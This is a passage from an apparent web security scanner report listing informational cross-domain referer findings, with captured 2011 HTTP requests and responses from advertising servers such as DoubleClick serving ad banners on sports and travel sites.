Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:50:07 GMT
Content-Length: 8096
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
</scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:90,
ad_w:728,
uqid:bap_rnd,
cps:''
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>');
(function() {
if(document.getElementById('ba.js')) return;
document.write('<sc'+'ript id="ba.js" type="text/javascript" src="http://c.betrad.com/geo/ba.js">
...[SNIP]...

19.2. http://ad.doubleclick.net/adi/N5282.161249.ADNETIK.COM/B5256632.283

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; both are shown in the request and response below.

Request

GET /adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 39912
Date: Mon, 03 Oct 2011 00:03:24 GMT

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayM
...[SNIP]...
tOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=http://www.softcoin.com/Sites/Kroger_ECoupons/Page/HomePage/Retailer/City_Market?cid=5256632">
<IMG SRC="http://s0.2mdn.net/1817628/PID_1732405_CBS0014_coupon_300x250.jpg" width="300" height="250" BORDER="0" alt="">
</A>
...[SNIP]...

19.3. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6010.456584.XAXIS.COM/B5752701.15

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; both are shown in the request and response below.

Request

GET /adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7472
Set-Cookie: id=ca5b4d83c000017||t=1317599554|et=730|cs=002213fd4884e3bed7d9e725fe; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:52:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:52:34 GMT
Date: Sun, 02 Oct 2011 23:52:34 GMT
Expires: Sun, 02 Oct 2011 23:52:34 GMT
Cache-Control: private

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Thu Sep 01 05:06:56 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3Dhttp%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_ZAP"><img src="http://s0.2mdn.net/2502400/LloydsTSB_PIA_Direct_728x90.gif" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

19.4. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.28

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; both are shown in the request and response below.

Request

GET /adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjEsOgzAMBa.CvCYS8Qe_cJvQpCvUXVdV747NyjPS8_xIhI6lQWtbFxIOgZsywmoIYb7Awl5aNxQ9ey_gsZWJOcYb2qcb5WuO3XjztOxk0OLK_tQ08PO9rsA9sJqK._8GBj4bwg--&redirectURL=;ord=8ec82327-9a58-4baa-82d0-e8eddf84ae75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7661
Set-Cookie: id=c28c1d83c000039||t=1317600006|et=730|cs=002213fd48e65c670a029fff3e; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:06 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:06 GMT
Date: Mon, 03 Oct 2011 00:00:06 GMT
Expires: Mon, 03 Oct 2011 00:00:06 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Sep 21 16:47:44 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
74783%26migRandom%3D7648338%26migTrackFmtExt%3Dclient%3Bio%3Bad%3Bcrtv%26migUnencodedDest%3Dhttp%3A//www.directv.com/DTVAPP/new_customer/base_packages.jsp%3FCMP%3DBAC|5912738|902003|72099485|44174783"><img src="http://s0.2mdn.net/2590120/DTV-171_best-stackcount_nat_300x250_R2.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript><script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script277.js?agnc=900745&cmp=5912738&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=72099485&advid=2590120&sid=902003&adid='></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=235&migSource=adsrv2&migTrackDataExt=2590120;72099485;246929944;44174783&migRandom=7648338&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...

19.5. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.30

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; both are shown in the request and response below.

Request

GET /adi/N6054.Invitemedia.com/B5912738.30;sz=728x90;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOhDAMBL.CXBMpWduxw2_IARW6jgrd38.udkba3ZeYaVuGSxvrQowQNxWktRBCvQA4l30cUqTrUXY7ZznlqlOrf2wy5TTLpqiWlj95oZHc4YES.H3uO7AHNhU2_P7igxtH&redirectURL=;ord=20f22283-a9d4-465d-a7eb-e4f0b508c7b3? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7636
Date: Sun, 02 Oct 2011 23:59:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Sep 26 17:08:53 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
56607%26migRandom%3D1471515%26migTrackFmtExt%3Dclient%3Bio%3Bad%3Bcrtv%26migUnencodedDest%3Dhttp%3A//www.directv.com/DTVAPP/new_customer/base_packages.jsp%3FCMP%3DBAC|5912738|902003|72099489|44256607"><img src="http://s0.2mdn.net/2590120/DTV-171_best-stackcount_nat_728x90_R2.gif" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript><script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script277.js?agnc=900745&cmp=5912738&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=72099489&advid=2590120&sid=902003&adid='></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=235&migSource=adsrv2&migTrackDataExt=2590120;72099489;246929846;44256607&migRandom=1471515&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...

19.6. http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; both are shown in the request and response below.

Request

GET /adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592%26Segments%3d1,9,889,3090,3199,4300,4303,5796,5909,9520,10495,10506,11148,12670,13933,16594,17659,20052,20299,20311,20993,21150,21265,21649,21682,22041,22251,22308,22422,22551,22552,22607,22609,22612,22652,22783,22972,22974,23041,23043,23055,23123,23137,23138,23153,23212%26Targets%3d8858,11482,8427,8852,28340,30402,30431,31767,31928,32592,33460,33543,34010,8830,34059,34011,34009,33719,34787,33164,34632%26Values%3d25,60,80,92,101,150,152,194,208,215,232,261,264,2176,2218,2285,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2468,2537,4760,4772,6472,6474,6510,6974,8829,9080,9119,9844,9845,9846,11161,12194,12196,12728,12736,12804%26Redirect%3d;ord=badigyw,bhirWrczqllc? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1266
Date: Mon, 03 Oct 2011 00:14:33 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...
4772,6472,6474,6510,6974,8829,9080,9119,9844,9845,9846,11161,12194,12196,12728,12736,12804%26Redirect%3dhttp%3a%2f%2fleisure.travelocity.com/Promotions/0%2C%2CTRAVELOCITY|5850|airfare_main|%2C00.html"><img src="http://s0.2mdn.net/viewad/2784362/B6_FirstBags_160x600.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.7. http://ad.doubleclick.net/adi/gna.en/level2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/gna.en/level2

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; both are shown in the request and response below.

Request

GET /adi/gna.en/level2;tile=5;sz=160x600;ord=940345?area=2l&pos=2&league=epl&ord=940345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 562
Date: Mon, 03 Oct 2011 00:00:10 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript"><!--
   e9 = new Object();
e9
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Goalcomnew/US/tags.js"></script>
...[SNIP]...

19.8. http://ad.doubleclick.net/adj/cm.guardian/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.guardian/

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; both are shown in the request and response below.

Request

GET /adj/cm.guardian/;net=cm;u=,cm-30313306848_1317599407,,soccer,ax.;;sz=728x90;net=cm;env=ifr;ord1=879803;dcopt=ist;cmw=owl;contx=soccer;an=;dc=s;btg=;ord=$random$? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 491
Date: Sun, 02 Oct 2011 23:50:08 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b94/0/0/%2a/e;234516816;0-0;0;24869226;3454-728/90;41773615/41791402/1;u=,cm-30313306848_1317599407,,soccer,ax.;~okv=;net=cm;u=,cm-30313306848_1317599407,,soccer,ax.;;sz=728x90;net=cm;env=ifr;ord1=879803;dcopt=ist;cmw=owl;contx=soccer;an=;dc=s;btg=;~aopt=2/0/ec/0;~sscs=%3fhttp://fightglobalwarming.com"><img src="http://s0.2mdn.net/viewad/2167886/728x90.GIF" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.9. http://ad.doubleclick.net/adj/cm.guardian/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.guardian/

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; both are shown in the request and response below.

Request

GET /adj/cm.guardian/;net=cm;u=,cm-30120266127_1317599407,,soccer,ax.;;sz=300x250;net=cm;env=ifr;ord1=63589;dcopt=ist;cmw=owl;contx=soccer;an=;dc=s;btg=;ord=$random$? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 493
Date: Sun, 02 Oct 2011 23:51:34 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b94/0/0/%2a/u;234516818;0-0;0;24869226;4307-300/250;41773664/41791451/1;u=,cm-30120266127_1317599407,,soccer,ax.;~okv=;net=cm;u=,cm-30120266127_1317599407,,soccer,ax.;;sz=300x250;net=cm;env=ifr;ord1=63589;dcopt=ist;cmw=owl;contx=soccer;an=;dc=s;btg=;~aopt=2/0/ec/0;~sscs=%3fhttp://fightglobalwarming.com"><img src="http://s0.2mdn.net/viewad/2167886/300x250.GIF" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.10. http://ad.doubleclick.net/adj/gna.en/level2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gna.en/level2

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; both are shown in the request and response below.

Request

GET /adj/gna.en/level2;tile=2;sz=970x40;ord=981376?area=2l&team=manu&league=epl&pagetype=team&teamname=man-utd-news&ord=981376 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 245
Date: Sun, 02 Oct 2011 23:52:13 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b94/0/0/%2a/v;44306;0-0;0;42319734;28932-970/40;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.11. http://ad.doubleclick.net/adj/ta.ta.com.s/na.us.ma.boston

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ta.ta.com.s/na.us.ma.boston

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; both are shown in the request and response below.

Request

GET /adj/ta.ta.com.s/na.us.ma.boston;mcid=11893;PageType=SmartDeals;pool=T;geo=60745;u=SmartDeals%7CT;rd=com;abr=!webtv;hcm=false;hname=Boston;gname=Massachusetts;sz=728X90%2C970X66;tile=1;ord=62674771? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38538
Date: Mon, 03 Oct 2011 00:38:28 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
rtDeals%257CT%3B%7Eaopt%3D0/ff/8aed/ff%3B%7Efdr%3D245480538%3B0-0%3B0%3B28071764%3B3454-728/90%3B43869829/43887616/1%3Bu%3DSmartDeals|T%3B%7Eaopt%3D2/1/8aed/0%3B%7Esscs%3D%3fhttp://virginamerica.com/"><IMG SRC="http://s0.2mdn.net/3268620/PID_1701515__bacIMG728x90.jpg" width="728" height="90" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...

19.12. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; both are shown in the request and response below.

Request

GET /server/ads.js?pub=5757440&cch=5766809&code=5766822&l=300x250&aid=27255192&ahcid=2583672&bimpd=XtwKUI1Zs52EB1CP5AYjM4BAYyGskigYFME9-_flqzCjJ6blFxIWsymUjmVwAPMAQ3NqILtmftDEfX5J0Kab_PhJQY3n5aB8LYFmoY1scYnkOuPr29GBwJEIlGIG8y6-woDPCiqPiV08NCy4UXORWW1HcKcIB-ji-YZznvV7YFbW-jz71YgLww7DGj5OXU14xJ8juiR_Repi1zn-UozfAeCMVGq9XR5SiywZpmSZtC4PWshpjciO-FjY1pXHc1Ey9bQzHnpjv5_yeFvQGeirggVU6HL8gTJU10INlF7Q4ifg1w1T9pHaCpAOioCT8Bk3SI1EPZPTo59m_DiO-2gLEiLsKli7c3srR59_w2uApkZ4zOGxFlgqKMqOcLjGPeXu9QN9lquQ2IMiN24AK-JVtj4ShUqdCfZZ9an1FFgetJ6nL9CCJUK3wKLNKFDlir4DGnNxk5QAcyrq8hS2PQWsGSRN6cjv64iyAUwjrCV62Z4kNWUS9C6pnmY7wyLcrDnGbLgoGOmgImEokpFYr_do-jFboIKnDep8RxIrEqJex1vMN8BETOKrAOkHaet0vXqwvfBz5xDsVEqchMpjM7fNhXITkPzkVIWZMbJ-qkV8b82fkx1M292Tos0VGUTSslMWvzvm_C2gw3LCUGFlwKflrjU51HHY789nG4erhkB4WPijkriCu4UjPOsP76C358RxTC1cI3gHRYYzm1ggWtq2RptQx4als